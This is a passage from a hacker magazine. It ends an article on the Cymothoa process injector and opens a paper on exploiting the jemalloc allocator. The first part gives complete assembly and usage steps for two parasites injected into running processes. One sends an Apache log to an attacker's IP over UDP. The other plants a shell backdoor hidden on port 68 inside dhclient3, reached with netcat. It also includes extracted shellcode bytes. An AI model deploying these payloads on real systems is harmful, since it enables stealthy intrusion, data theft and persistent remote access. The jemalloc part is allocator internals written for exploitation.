%ebx, %ebx mov $11, %bl mov %esp, %ecx int $0x80 jmp restore_stack struct_sockaddr: call load_sockaddr .short 0x02 # AF_INET .short 0x5250 # PORT (replaced by the injector) .long 0x34565049 # DEST IP (replaced by the injector) restore_stack: # restore stack pop %ebx # socket descriptor pop %eax # buffer pointer pop %edx # buffer len pop %eax # flags pop %eax # struct_sockaddr address pop %eax # sizeof(struct_sockaddr) # deallocate buffer add %edx, %esp close_socket: # call to sys_close(socket) xorl %eax, %eax mov $6, %al int $0x80 return_to_main_proc: # call to sys_close(fd) xorl %eax, %eax mov $6, %al mov %edi, %ebx int $0x80 # return popa ret file_path: call load_file_path .ascii "/var/log/apache2/access.log" %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% The code is not written in a super-compact way, since the space it's not a problem and the ease of programming and modification has been preferred. The code can be summarized in a few steps: 1) Preable (we already know). 2) Check to see if it's the first execution. This step makes use of a persistent memory location, provided by the injector. 3) File open and check of length. 4) Comparison with previous file's length. 4.1) If unchanged the parasite returns the execution to the host process. 4.2) If changed the execution continues. 5) Read the new lines of the file. 6) Send the new lines to the attacker via UDP 7) Restore the stack 8) Return the execution to the host process. The shellcode receives several parameters from the injector: the address of a persistent memory location, the attacker IP address and port, and the microsecond interval for the timer. The injector simply replaces known hexadecimal mark with these parameters during the injection. You can see where the replacements occur looking at the comments of the code. Now on to the fun part: the practical use of the parasite. The first thing to do is to prepare the server on the attacker's machine to receive data. Inside the main directory of the injector is present a simple implementation of UDP server. You need only to specify an available port: root@attacker# ./udp_server 5555 ./udp_server: listening on port UDP 5555 Now we can move to the victim's machine, and choose suitable process. For simplicity we will use cat again. To inject the parasite we must specify some parameters: root@victim# ./cymothoa -p `pidof cat` -s 14 -k 5000 -x attacker_ip -y 5555 [+] attaching to process 4694 register info: ----------------------------------------------------------- eax value: 0xfffffe00 ebx value: 0x0 esp value: 0xbfa9f3f8 eip value: 0xb77e8430 ------------------------------------------------------------ [+] new esp: 0xbfa9f3f4 [+] injecting code into 0xb77e9000 [+] copy general purpose registers [+] persistent memory at 0xb7805000 (if used) [+] detaching from 4694 [+] infected!!! The process is now infected. No new process has been created. Now, assuming an apache2 server is running, we can try to make some requests to the server to update /var/log/apache2/access.log (the file we are monitoring). root@attacker# curl victim_ip

It works!

This is the default web page for this server.

The web server software is running but no content has been added.

If everything worked properly we should see, in the console of the UDP server UDP, the new lines generated by our requests: root@attacker# ./udp_server 5555 ./udp_server: listening on port UDP 5555 ::1 - - [26/May/2011:11:18:57 +0200] "GET / HTTP/1.1" 200 460 "-" "curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15" ::1 - - [26/May/2011:11:19:26 +0200] "GET / HTTP/1.1" 200 460 "-" "curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k zlib/1.2.3.3 libidn/1.15" ... Et voila, we have a remote file sniffer! Of course the connections do not appear in the output of tools like netstat, as they are only brief exchanges of data, and sockets are open only when the monitored file has new lines (and immediately closed). Some notes on the proper use of this preamble and parasite: - This preamble is usually not compatible with virtually existing shellcode. The code must be modified to return the execution to the host process, restoring stack and registers. - It is better to inject the parasite into servers that run all the time the machine is on, but do not use processor very much. The server dhclient3 is a perfect host. ------------[ 5.3 Single process backdoor We have just arrived at the last and perhaps most interesting example of parasite of this document. That's what the author wanted to obtain: a backdoor that can live within another process, without calls to fork() and without creating new threads. The backdoor listens on a port (customizable by the injector), and periodically checks if a client is connected. This part has been implemented using nonblocking sockets and a modified alarm() preamble. When a client is connected, it obtains a shell: the only time a call to fork() is made. As long as the backdoor is in listening mode, the only way to notice its presence is to check the listening ports on the machine, but even in this case we can use some tricks to make our parasite very difficult to detect. Here's the code. %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% # # Single process backdoor (alarm preamble) # handler: pusha set_signal_handler: # signal(SIGALRM, handler) xorl %eax, %eax xorl %ebx, %ebx mov $48, %al mov $14, %bl jmp set_signal_handler_end load_handler: pop %ecx subl $0x18, %ecx # adjust %ecx to point handler() int $0x80 jmp shellcode set_signal_handler_end: call load_handler shellcode: # check if already initialized mov $0x4d454d50, %esi # replaced by the injector # (persistent memory address) mov (%esi), %eax cmp $0xdeadbeef, %eax je accept_call # jump if already initialized socket_call: # call to sys_socketcall($0x01 (socket), *args) xorl %eax, %eax mov $102, %al xorl %ebx, %ebx mov $0x01, %bl jmp socket_args load_socket_args: pop %ecx int $0x80 # %eax = socket descriptor # save socket descriptor mov $0xdeadbeef, %ebx mov %ebx, (%esi) add $4, %esi mov %eax, (%esi) sub $4, %esi jmp fcntl_call socket_args: call load_socket_args .long 0x02 # AF_INET .long 0x01 # SOCK_STREAM .long 0x00 # NULL fcntl_call: # call to sys_fcntl(socket, F_GETFL) mov %eax, %ebx xorl %eax, %eax mov $55, %al xorl %ecx, %ecx mov $3, %cl int $0x80 # call to sys_fcntl(socket, F_SETFL, flags | O_NONBLOCK) mov %eax, %edx xorl %eax, %eax mov $55, %al mov $4, %cl orl $0x800, %edx # O_NONBLOCK (nonblocking socket) int $0x80 bind_call: # prepare sys_socketcall (bind) arguments jmp struct_sockaddr load_sockaddr: pop %ecx push $0x10 # sizeof(struct_sockaddr) push %ecx # struct_sockaddr address push %ebx # socket descriptor # call to sys_socketcall($0x02 (bind), *args) xorl %eax, %eax mov $102, %al xorl %ebx, %ebx mov $0x02, %bl mov %esp, %ecx int $0x80 jmp listen_call struct_sockaddr: call load_sockaddr .short 0x02 # AF_INET .short 0x5250 # PORT (replaced by the injector) .long 0x00 # INADDR_ANY listen_call: pop %eax # socket descriptor pop %ebx push $0x10 # queue (backlog) push %eax # socket descriptor # call to sys_socketcall($0x04 (listen), *args) xorl %eax, %eax mov $102, %al xorl %ebx, %ebx mov $0x04, %bl mov %esp, %ecx int $0x80 # restore stack pop %edi pop %edi pop %edi accept_call: # prepare sys_socketcall (accept) arguments xorl %ecx, %ecx push %ecx # socklen_t *addrlen push %ecx # struct sockaddr *addr add $4, %esi push (%esi) # socket descriptor # call to sys_socketcall($0x05 (accept), *args) xorl %eax, %eax mov $102, %al xorl %ebx, %ebx mov $0x05, %bl mov %esp, %ecx int $0x80 # %eax = file descriptor or negative (on error) mov %eax, %edx # save file descriptor # restore stack pop %edi pop %edi pop %edi # check return value test %eax, %eax js schedule_next_and_return # jump on error (negative %eax) fork_child: # call to sys_fork() xorl %eax, %eax mov $2, %al int $0x80 test %eax, %eax jz dup2_multiple_calls # child continue execution # parent schedule_next_and_return schedule_next_and_return: # call to sys_close(socket file descriptor) # (since is used only by the child process) xorl %eax, %eax mov $6, %al mov %edx, %ebx int $0x80 # call to sys_waitpid(-1, NULL, WNOHANG) # (to remove zombie processes) xorl %eax, %eax mov $7, %al xorl %ebx, %ebx dec %ebx xorl %ecx, %ecx xorl %edx, %edx mov $1, %dl int $0x80 # alarm(timeout) xorl %eax, %eax mov $27, %al movl $0x53434553, %ebx # replaced by the injector (seconds) int $0x80 # return popa ret dup2_multiple_calls: # dup2(socket, 2), dup2(socket, 1), dup2(socket, 0) xorl %eax, %eax xorl %ecx, %ecx mov %edx, %ebx mov $2, %cl dup2_loop: mov $63, %al int $0x80 dec %ecx jns dup2_loop execve_call: # call to sys_execve(program, *args) xorl %eax, %eax mov $11, %al jmp program_path load_program_path: pop %ebx # create argument list [program_path, NULL] xorl %ecx, %ecx push %ecx push %ebx mov %esp, %ecx mov %esp, %edx int $0x80 program_path: call load_program_path .ascii "/bin/sh" %<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<% A little summary of the code: 1) Half preable, only the signal() part. 2) Check to see if it's the first execution. This step makes use of a persistent memory location, provided by the injector. 2.1) If already initialized jump to 7 2.2) If not initialized continue 3) Open socket. 4) Set nonblocking using fcntl(). 5) Bind socket to the specified port. 6) Socket in listen mode with listen(). 7) Check if a client is connected using accept(). 7.1) No clients, jump to 9 7.2) Client connected, continue 8) Fork() a child process and execute a shell. 9) Set the timer and resume host execution (the second half of the preamble) For this shellcode the provided arguments are a persistent memory address, the port to listen on and the timer (in seconds). Finally, let's see a practical example of use. First, we must identify our host process. We need also to find a door is not likely to arouse suspicion. root@victim# lsof -a -i -c dhclient3 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME dhclient3 1232 root 5u IPv4 4555 0t0 UDP *:bootpc dhclient3 1612 root 4u IPv4 4554 0t0 UDP *:bootpc Here we can see two dhclient3 processes with port 68/UDP open (bootpc): a good strategy for our backdoor is to listen on port 68/TCP... root@victim# ./cymothoa -p 1612 -s 13 -j 1 -y 68 [+] attaching to process 1612 register info: ----------------------------------------------------------- eax value: 0xfffffdfe ebx value: 0x6 esp value: 0xbfff6dd0 eip value: 0xb7682430 ------------------------------------------------------------ [+] new esp: 0xbfff6dcc [+] injecting code into 0xb7683000 [+] copy general purpose registers [+] persistent memory at 0xb769f000 (if used) [+] detaching from 1612 [+] infected!!! Let's see the result: root@victim# lsof -a -i -c dhclient3 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME dhclient3 1232 root 5u IPv4 4555 0t0 UDP *:bootpc dhclient3 1612 root 4u IPv4 4554 0t0 UDP *:bootpc dhclient3 1612 root 7u IPv4 21892 0t0 TCP *:bootpc (LISTEN) As you can see it is very difficult to see that something is wrong... Now the attacker can connect to the victim and get a shell: root@attacker# nc -vv victim_ip 68 Connection to victim_ip 68 port [tcp/bootpc] succeeded! uname -a Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux We have achieved our goal: a single process backdoor :) ------[ 6. Something about the injector In all these examples we always used the injector cymothoa [3]. Some notes about this tool... The injector is very important because it allows the customization of the shellcode and its injection in the right areas of memory. Cymothoa wants to be an aid to developing shellcode, in several ways. In the payloads directory there are all the assembly sources created by the author, easily compilable with gcc: root@box# cd payloads root@box# ls clone_shellcode.s fork_shellcode.s scheduled_backdoor_alarm.s mmx_example_shellcode.s scheduled_setitimer.s scheduled_alarm.s scheduled_tail_setitimer.s root@box# gcc -c scheduled_backdoor_alarm.s root@box# Cymothoa includes also some tools to easily extract the shellcode from these object files. For example bgrep [6], a binary grep, that allows to find the offset of of particular hexadecimal sequences: root@box# ./bgrep e8f0ffffff payloads/scheduled_backdoor_alarm.o payloads/scheduled_backdoor_alarm.o: 0000014b This is useful for finding the beginning of the code to extract. Once you locate the beginning and the length of the code, you can easily turn it into a C string with the script hexdump_to_cstring.pl. root@box# hexdump -C -s 52 payloads/scheduled_backdoor_alarm.o -n 291 | \ ./hexdump_to_cstring.pl \x60\x31\xc0\x31\xdb\xb0\x30\xb3\x0e\xeb\x08\x59\x83\xe9\x18\xcd\x80\xeb \x05\xe8\xf3\xff\xff\xff\xbe\x50\x4d\x45\x4d\x8b\x06\x3d\xef\xbe\xad\xde \x0f\x84\x81\x00\x00\x00\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xeb\x14\x59\xcd ... Once this is done you can add this string to the file payloads.h, and recompile cymothoa, to have a new, ready to inject, parasite. If you want to transform into parasite code you already have available, that's the easy way. The last thing I want to mention about cymothoa, is a little utility shipped with the main tool: a syscall code generator. Writing syscall based shellcodes can be a tedious work, especially if you must remember every syscall number and parameters. Since I am a lazy person, I've written a script able to do part of the hard work: root@box# ./syscall_code.pl Syscall shellcode generator Usage: ./syscall_code.pl syscall For example you can use it to generate the calling sequence for the open syscall: root@box# ./syscall_code.pl sys_open sys_open_call: # call to sys_open(filename, flags, mode) xorl %eax, %eax mov $5, %al xorl %ebx, %ebx mov filename, %bl xorl %ecx, %ecx mov flags, %cl xorl %edx, %edx mov mode, %dl int $0x80 As you can see the script generates assembly code that marks arguments and corresponding registers of the syscall, as well as the call number. The code is not always 100% reliable (e.g. some syscalls require complex structures the script is not able to construct), but it can greatly speed up the shellcode development phase. I hope you'll find it useful... ------[ 7. Further reading While I was writing this article, on the defcon's website have been published the talks which will take place during the next edition. One of these caught my attention [7]: Jugaad - Linux Thread Injection Kit "... The kit currently works on Linux, allocates space inside a process and injects and executes arbitrary payload as a thread into that process. It utilizes the ptrace() functionality to manipulate other processes on the system. ptrace() is an API generally used by debuggers to manipulate(debug) a program. By using the same functionality to inject and manipulate the flow of execution of a program Jugaad is able to inject the payload as a thread." I recommend all readers who have judged this article interesting, to follow this talk, because it is a similar research, but parallel to mine. My goal was to implement a stealth backdoor without creating new processes or threads, while the research of Aseem focuses on the creation of threads, to achieve the same level of stealthiness. I therefore offer my best wishes to Aseem, since I think our works are complementary. For additional material on "injection of code" you can see the links listed at the end of the document. Bye bye ppl ;) Greetings (in random order): emgent, scox, white_sheep (and all ihteam), sugar, renaud, bt_smarto, cris. ------[ 8. Links and references [0] https://secure.wikimedia.org/wikipedia/en/wiki/Ptrace [1] http://dl.packetstormsecurity.net/papers/unix/elf-runtime-fixup.txt [2] http://www.phrack.org/issues.html?issue=58&id=4#article (5 - The dynamic linker's dl-resolve() function) [3] http://vxheavens.com/lib/vrn00.html#c42 [4] http://cymothoa.sourceforge.net/ [5] http://www.exploit-db.com/exploits/13388/ [6] http://debugmo.de/2009/04/bgrep-a-binary-grep/ [7] https://www.defcon.org/html/defcon-19/dc-19-speakers.html#Jakhar ------[ EOF ============== Page 10/17 ============== ==Phrack Inc.== Volume 0x0e, Issue 0x44, Phile #0x0a of 0x13 |=-----------------------------------------------------------------------=| |=-------------------=[ Pseudomonarchia jemallocum ]=--------------------=| |=-----------------------------------------------------------------------=| |=---------------=[ The false kingdom of jemalloc, or ]=------------------| |=-----------=[ On exploiting the jemalloc memory manager ]=-------------=| |=-----------------------------------------------------------------------=| |=------------------------=[ argp | huku ]=------------------------=| |=--------------------=[ {argp,huku}@grhack.net ]=---------------------=| |=-----------------------------------------------------------------------=| --[ Table of contents 1 - Introduction 1.1 - Thousand-faced jemalloc 2 - jemalloc memory allocator overview 2.1 - Basic structures 2.1.1 - Chunks (arena_chunk_t) 2.1.2 - Arenas (arena_t) 2.1.3 - Runs (arena_run_t) 2.1.4 - Regions/Allocations 2.1.5 - Bins (arena_bin_t) 2.1.6 - Huge allocations 2.1.7 - Thread caches (tcache_t) 2.1.8 - Unmask jemalloc 2.2 - Algorithms 3 - Exploitation tactics 3.1 - Adjacent region corruption 3.2 - Heap manipulation 3.3 - Metadata corruption 3.3.1 - Run (arena_run_t) 3.3.2 - Chunk (arena_chunk_t) 3.3.3 - Thread caches (tcache_t) 4 - A real vulnerability 5 - Future work 6 - Conclusion 7 - References 8 - Code --[ 1 - Introduction In this paper we investigate the security of the jemalloc allocator in both theory and practice. We are particularly interested in the exploitation of memory corruption bugs, so our security analysis will be biased towards that end. jemalloc is a userland memory allocator. It provides an implementation for the standard malloc(3) interface for dynamic memory management. It was written by Jason Evans (hence the 'je') for FreeBSD since there was a need for a high performance, SMP-enabled memory allocator for libc. After that, jemalloc was also used by the Mozilla Firefox browser as its internal dedicated custom memory allocator. All the above have led to a few versions of jemalloc that are very similar but not exactly the same. To summarize, there are three different widely used versions of jemalloc: 1) the standalone version [JESA], 2) the version in the Mozilla Firefox web browser [JEMF], and 3) the FreeBSD libc [JEFB] version. The exploitation vectors we investigate in this paper have been tested on the jemalloc versions presented in subsection 1.1, all on the x86 platform. We assume basic knowledge of x86 and a general familiarity with userland malloc() implementations, however these are not strictly required. ----[ 1.1 - Thousand-faced jemalloc There are so many different jemalloc versions that we almost went crazy double checking everything in all possible platforms. Specifically, we tested the latest standalone jemalloc version (2.2.3 at the time of this writing), the version included in the latest FreeBSD libc (8.2-RELEASE), and the Mozilla Firefox web browser version 11.0. Furthermore, we also tested the Linux port of the FreeBSD malloc(3) implementation (jemalloc_linux_20080828a in the accompanying code archive) [JELX]. --[ 2 - jemalloc memory allocator overview The goal of this section is to provide a technical overview of the jemalloc memory allocator. However, it is not all-inclusive. We will only focus on the details that are useful for understanding the exploitation attacks against jemalloc analyzed in the next section. The interested reader can look in [JE06] for a more academic treatment of jemalloc (including benchmarks, comparisons with other allocators, etc). Before we start our analysis we would like to point out that jemalloc (as well as other malloc implementations) does not implement concepts like 'unlinking' or 'frontlinking' which have proven to be catalytic for the exploitation of dlmalloc and Microsoft Windows allocators. That said, we would like to stress the fact that the attacks we are going to present do not directly achieve a write-4-anywhere primitive. We, instead, focus on how to force malloc() (and possibly realloc()) to return a chunk that will most likely point to an already initialized memory region, in hope that the region in question may hold objects important for the functionality of the target application (C++ VPTRs, function pointers, buffer sizes and so on). Considering the various anti-exploitation countermeasures present in modern operating systems (ASLR, DEP and so on), we believe that such an outcome is far more useful for an attacker than a 4 byte overwrite. jemalloc, as a modern memory allocator should, recognizes that minimal page utilization is no longer the most critical feature. Instead it focuses on enhanced performance in retrieving data from the RAM. Based on the principle of locality which states that items that are allocated together are also used together, jemalloc tries to situate allocations contiguously in memory. Another fundamental design choice of jemalloc is its support for SMP systems and multi-threaded applications by trying to avoid lock contention problems between many simultaneously running threads. This is achieved by using many 'arenas' and the first time a thread calls into the memory allocator (for example by calling malloc(3)) it is associated with a specific arena. The assignment of threads to arenas happens with three possible algorithms: 1) with a simple hashing on the thread's ID if TLS is available 2) with a simple builtin linear congruential pseudo random number generator in case MALLOC_BALANCE is defined and TLS is not available 3) or with the traditional round-robin algorithm. For the later two cases, the association between a thread and an arena doesn't stay the same for the whole life of the thread. Continuing our high-level overview of the main jemalloc structures before we dive into the details in subsection 2.1, we have the concept of 'chunks'. jemalloc divides memory into chunks, always of the same size, and uses these chunks to store all of its other data structures (and user-requested memory as well). Chunks are further divided into 'runs' that are responsible for requests/allocations up to certain sizes. A run keeps track of free and used 'regions' of these sizes. Regions are the heap items returned on user allocations (e.g. malloc(3) calls). Finally, each run is associated with a 'bin'. Bins are responsible for storing structures (trees) of free regions. The following diagram illustrates in an abstract manner the relationships between the basic building blocks of jemalloc. Chunk #0 Chunk #1 .--------------------------------. .--------------------------------. | | | | | Run #0 Run #1 | | Run #0 Run #1 | | .-------------..-------------. | | .-------------..-------------. | | | || | | | | || | | | | Page || Page | | | | Page || Page | | | | .---------. || .---------. | | | | .---------. || .---------. | | | | | | || | | | | | | | | || | | | | ... | | | Regions | || | Regions | | | | | | Regions | || | Regions | | | | | |[] [] [] | || |[] [] [] | | | | | |[] [] [] | || |[] [] [] | | | | | | ^ ^ | || | | | | | | | ^ ^ | || | | | | | | `-|-----|-' || `---------' | | | | `-|-----|-' || `---------' | | | `---|-----|---'`-------------' | | `---|-----|---'`-------------' | `-----|-----|--------------------' `-----|-----|--------------------' | | | | | | | | .---|-----|----------. .---|-----|----------. | | | | | | | | | free regions' tree | ... | free regions' tree | ... | | | | `--------------------' `--------------------' bin[Chunk #0][Run #0] bin[Chunk #1][Run #0] ----[ 2.1 - Basic structures In the following paragraphs we analyze in detail the basic jemalloc structures. Familiarity with these structures is essential in order to begin our understanding of the jemalloc internals and proceed to the exploitation step. ------[ 2.1.1 - Chunks (arena_chunk_t) If you are familiar with Linux heap exploitation (and more precisely with dlmalloc internals) you have probably heard of the term 'chunk' before. In dlmalloc, the term 'chunk' is used to denote the memory regions returned by malloc(3) to the end user. We hope you get over it soon because when it comes to jemalloc the term 'chunk' is used to describe big virtual memory regions that the memory allocator conceptually divides available memory into. The size of the chunk regions may vary depending on the jemalloc variant used. For example, on FreeBSD 8.2-RELEASE, a chunk is a 1 MB region (aligned to its size), while on the latest FreeBSD (in CVS at the time of this writing) a jemalloc chunk is a region of size 2 MB. Chunks are the highest abstraction used in jemalloc's design, that is the rest of the structures described in the following paragraphs are actually placed within a chunk somewhere in the target's memory. The following are the chunk sizes in the jemalloc variants we have examined: +---------------------------------------+ | jemalloc variant | Chunk size | +---------------------------------------+ | FreeBSD 8.2-RELEASE | 1 MB | ----------------------------------------- | Standalone v2.2.3 | 4 MB | ----------------------------------------- | jemalloc_linux_20080828a | 1 MB | ----------------------------------------- | Mozilla Firefox v5.0 | 1 MB | ----------------------------------------- | Mozilla Firefox v7.0.1 | 1 MB | ----------------------------------------- | Mozilla Firefox v11.0 | 1 MB | ----------------------------------------- An area of jemalloc managed memory divided into chunks looks like the following diagram. We assume a chunk size of 4 MB; remember that chunks are aligned to their size. The address 0xb7000000 does not have a particular significance apart from illustrating the offsets between each chunk. +-------------------------------------------------------------------------+ | Chunk alignment | Chunk content | +-------------------------------------------------------------------------+ | Chunk #1 starts at: 0xb7000000 [ Arena ] | Chunk #2 starts at: 0xb7400000 [ Arena ] | Chunk #3 starts at: 0xb7800000 [ Arena ] | Chunk #4 starts at: 0xb7c00000 [ Arena ] | Chunk #5 starts at: 0xb8000000 [ Huge allocation region, see below ] | Chunk #6 starts at: 0xb8400000 [ Arena ] | Chunk #7 starts at: 0xb8800000 [ Huge allocation region ] | Chunk #8 starts at: 0xb8c00000 [ Huge allocation region ] | Chunk #9 starts at: 0xb9000000 [ Arena ] +-------------------------------------------------------------------------+ Huge allocation regions are memory regions managed by jemalloc chunks that satisfy huge malloc(3) requests. Apart from the huge size class, jemalloc also has the small/medium and large size classes for end user allocations (both managed by arenas). We analyze jemalloc's size classes of regions in subsection 2.1.4. Chunks are described by 'arena_chunk_t' structures (taken from the standalone version of jemalloc; we have added and removed comments in order to make things more clear): [2-1] typedef struct arena_chunk_s arena_chunk_t; struct arena_chunk_s { /* The arena that owns this chunk. */ arena_t *arena; /* A list of the corresponding arena's dirty chunks. */ ql_elm(arena_chunk_t) link_dirty; /* * Whether this chunk contained at some point one or more dirty pages. */ bool dirtied; /* This chunk's number of dirty pages. */ size_t ndirty; /* * A chunk map element corresponds to a page of this chunk. The map * keeps track of free and large/small regions. */ arena_chunk_map_t map[]; }; The main use of chunk maps in combination with the memory alignment of the chunks is to enable constant time access to the management metadata of free and large/small heap allocations (regions). ------[ 2.1.2 - Arenas (arena_t) An arena is a structure that manages the memory areas jemalloc divides into chunks. Arenas can span more than one chunk, and depending on the size of the chunks, more than one page as well. As we have already mentioned, arenas are used to mitigate lock contention problems between threads. Therefore, allocations and deallocations from a thread always happen on the same arena. Theoretically, the number of arenas is in direct relation to the need for concurrency in memory allocation. In practice the number of arenas depends on the jemalloc variant we deal with. For example, in Firefox's jemalloc there is only one arena. In the case of single-CPU systems there is also only one arena. In SMP systems the number of arenas is equal to either two (in FreeBSD 8.2) or four (in the standalone variant) times the number of available CPU cores. Of course, there is always at least one arena. Debugging the standalone variant with gdb: gdb $ print ncpus $86 = 0x4 gdb $ print narenas $87 = 0x10 Arenas are the central jemalloc data structures as they are used to manage the chunks (and the underlying pages) that are responsible for the small and large allocation size classes. Specifically, the arena structure is defined as follows: [2-2] typedef struct arena_s arena_t; struct arena_s { /* This arena's index in the arenas array. */ unsigned ind; /* Number of threads assigned to this arena. */ unsigned nthreads; /* Mutex to protect certain operations. */ malloc_mutex_t lock; /* * Chunks that contain dirty pages managed by this arena. When jemalloc * requires new pages these are allocated first from the dirty pages. */ ql_head(arena_chunk_t) chunks_dirty; /* * Each arena has a spare chunk in order to cache the most recently * freed chunk. */ arena_chunk_t *spare; /* The number of pages in this arena's active runs. */ size_t nactive; /* The number of pages in unused runs that are potentially dirty. */ size_t ndirty; /* The number of pages this arena's threads are attempting to purge. */ size_t npurgatory; /* * Ordered tree of this arena's available clean runs, i.e. runs * associated with clean pages. */ arena_avail_tree_t runs_avail_clean; /* * Ordered tree of this arena's available dirty runs, i.e. runs * associated with dirty pages. */ arena_avail_tree_t runs_avail_dirty; /* * Bins are used to store structures of free regions managed by this * arena. */ arena_bin_t bins[]; }; All in all a fairly simple structure. As it is clear from the above structure, the allocator contains a global array of arenas and an unsigned integer representing the number of these arenas: arena_t **arenas; unsigned narenas; And using gdb we can see the following: gdb $ x/x arenas 0xb7800cc0: 0xb7800740 gdb $ print arenas[0] $4 = (arena_t *) 0xb7800740 gdb $ x/x &narenas 0xb7fdfdc4 : 0x00000010 At 0xb7800740 we have 'arenas[0]', that is the first arena, and at 0xb7fdfdc4 we have the number of arenas, i.e 16. ------[ 2.1.3 - Runs (arena_run_t) Runs are further memory denominations of the memory divided by jemalloc into chunks. Runs exist only for small and large allocations (see subsection 2.1.1), but not for huge allocations. In essence, a chunk is broken into several runs. Each run is actually a set of one or more contiguous pages (but a run cannot be smaller than one page). Therefore, they are aligned to multiples of the page size. The runs themselves may be non-contiguous but they are as close as possible due to the tree search heuristics implemented by jemalloc. The main responsibility of a run is to keep track of the state (i.e. free or used) of end user memory allocations, or regions as these are called in jemalloc terminology. Each run holds regions of a specific size (however within the small and large size classes as we have mentioned) and their state is tracked with a bitmask. This bitmask is part of a run's metadata; these metadata are defined with the following structure: [2-3] typedef struct arena_run_s arena_run_t; struct arena_run_s { /* * The bin that this run is associated with. See 2.1.5 for details on * the bin structures. */ arena_bin_t *bin; /* * The index of the next region of the run that is free. On the FreeBSD * and Firefox flavors of jemalloc this variable is named regs_minelm. */ uint32_t nextind; /* The number of free regions in the run. */ unsigned nfree; /* * Bitmask for the regions in this run. Each bit corresponds to one * region. A 0 means the region is used, and an 1 bit value that the * corresponding region is free. The variable nextind (or regs_minelm * on FreeBSD and Firefox) is the index of the first non-zero element * of this array. */ unsigned regs_mask[]; }; Don't forget to re-read the comments ;) ------[ 2.1.4 - Regions/Allocations In jemalloc the term 'regions' applies to the end user memory areas returned by malloc(3). As we have briefly mentioned earlier, regions are divided into three classes according to their size, namely a) small/medium, b) large and c) huge. Huge regions are considered those that are bigger than the chunk size minus the size of some jemalloc headers. For example, in the case that the chunk size is 4 MB (4096 KB) then a huge region is an allocation greater than 4078 KB. Small/medium are the regions that are smaller than a page. Large are the regions that are smaller than the huge regions (chunk size minus some headers) and also larger than the small/medium regions (page size). Huge regions have their own metadata and are managed separately from small/medium and large regions. Specifically, they are managed by a global to the allocator red-black tree and they have their own dedicated and contiguous chunks. Large regions have their own runs, that is each large allocation has a dedicated run. Their metadata are situated on the corresponding arena chunk header. Small/medium regions are placed on different runs according to their specific size. As we have seen in 2.1.3, each run has its own header in which there is a bitmask array specifying the free and the used regions in the run. In the standalone flavor of jemalloc the smallest run is that for regions of size 4 bytes. The next run is for regions of size 8 bytes, the next for 16 bytes, and so on. When we do not mention it specifically, we deal with small/medium and large region classes. We investigate the huge region size class separately in subsection 2.1.6. ------[ 2.1.5 - Bins (arena_bin_t) Bins are used by jemalloc to store free regions. Bins organize the free regions via runs and also keep metadata about their regions, like for example the size class, the total number of regions, etc. A specific bin may be associated with several runs, however a specific run can only be associated with a specific bin, i.e. there is an one-to-many correspondence between bins and runs. Bins have their associated runs organized in a tree. Each bin has an associated size class and stores/manages regions of this size class. A bin's regions are managed and accessed through the bin's runs. Each bin has a member element representing the most recently used run of the bin, called 'current run' with the variable name runcur. A bin also has a tree of runs with available/free regions. This tree is used when the current run of the bin is full, that is it doesn't have any free regions. A bin structure is defined as follows: [2-4] typedef struct arena_bin_s arena_bin_t; struct arena_bin_s { /* * Operations on the runs (including the current run) of the bin * are protected via this mutex. */ malloc_mutex_t lock; /* * The current run of the bin that manages regions of this bin's size * class. */ arena_run_t *runcur; /* * The tree of the bin's associated runs (all responsible for regions * of this bin's size class of course). */ arena_run_tree_t runs; /* The size of this bin's regions. */ size_t reg_size; /* * The total size of a run of this bin. Remember that each run may be * comprised of more than one pages. */ size_t run_size; /* The total number of regions in a run of this bin. */ uint32_t nregs; /* * The total number of elements in the regs_mask array of a run of this * bin. See 2.1.3 for more information on regs_mask. */ uint32_t regs_mask_nelms; /* * The offset of the first region in a run of this bin. This can be * non-zero due to alignment requirements. */ uint32_t reg0_offset; }; As an example, consider the following three allocations and that the jemalloc flavor under investigation has 2 bytes as the smallest possible allocation size (file test-bins.c in the code archive, example run on FreeBSD): one = malloc(2); two = malloc(8); three = malloc(16); Using gdb let's explore jemalloc's structures. First let's see the runs that the above allocations created in their corresponding bins: gdb $ print arenas[0].bins[0].runcur $25 = (arena_run_t *) 0xb7d01000 gdb $ print arenas[0].bins[1].runcur $26 = (arena_run_t *) 0x0 gdb $ print arenas[0].bins[2].runcur $27 = (arena_run_t *) 0xb7d02000 gdb $ print arenas[0].bins[3].runcur $28 = (arena_run_t *) 0xb7d03000 gdb $ print arenas[0].bins[4].runcur $29 = (arena_run_t *) 0x0 Now let's see the size classes of these bins: gdb $ print arenas[0].bins[0].reg_size $30 = 0x2 gdb $ print arenas[0].bins[1].reg_size $31 = 0x4 gdb $ print arenas[0].bins[2].reg_size $32 = 0x8 gdb $ print arenas[0].bins[3].reg_size $33 = 0x10 gdb $ print arenas[0].bins[4].reg_size $34 = 0x20 We can see that our three allocations of sizes 2, 8 and 16 bytes resulted in jemalloc creating runs for these size classes. Specifically, 'bin[0]' is responsible for the size class 2 and its current run is at 0xb7d01000, 'bin[1]' is responsible for the size class 4 and doesn't have a current run since no allocations of size 4 were made, 'bin[2]' is responsible for the size class 8 with its current run at 0xb7d02000, and so on. In the code archive you can find a Python script for gdb named unmask_jemalloc.py for easily enumerating the size of bins and other internal information in the various jemalloc flavors (see 2.1.8 for a sample run). At this point we should mention that in jemalloc an allocation of zero bytes (that is a malloc(0) call) will return a region of the smallest size class; in the above example a region of size 2. The smallest size class depends on the flavor of jemalloc. For example, in the standalone flavor it is 4 bytes. The following diagram summarizes our analysis of jemalloc up to this point: .----------------------------------. .---------------------------. .----------------------------------. | +--+-----> arena_chunk_t | .---------------------------------. | | | | | | arena_t | | | | | .---------------------. | | | | | | | | | | | .--------------------. | | | | | | arena_run_t | | | | arena_chunk_t list |-----+ | | | | | | | | | `--------------------' | | | | | | | .-----------. | | | 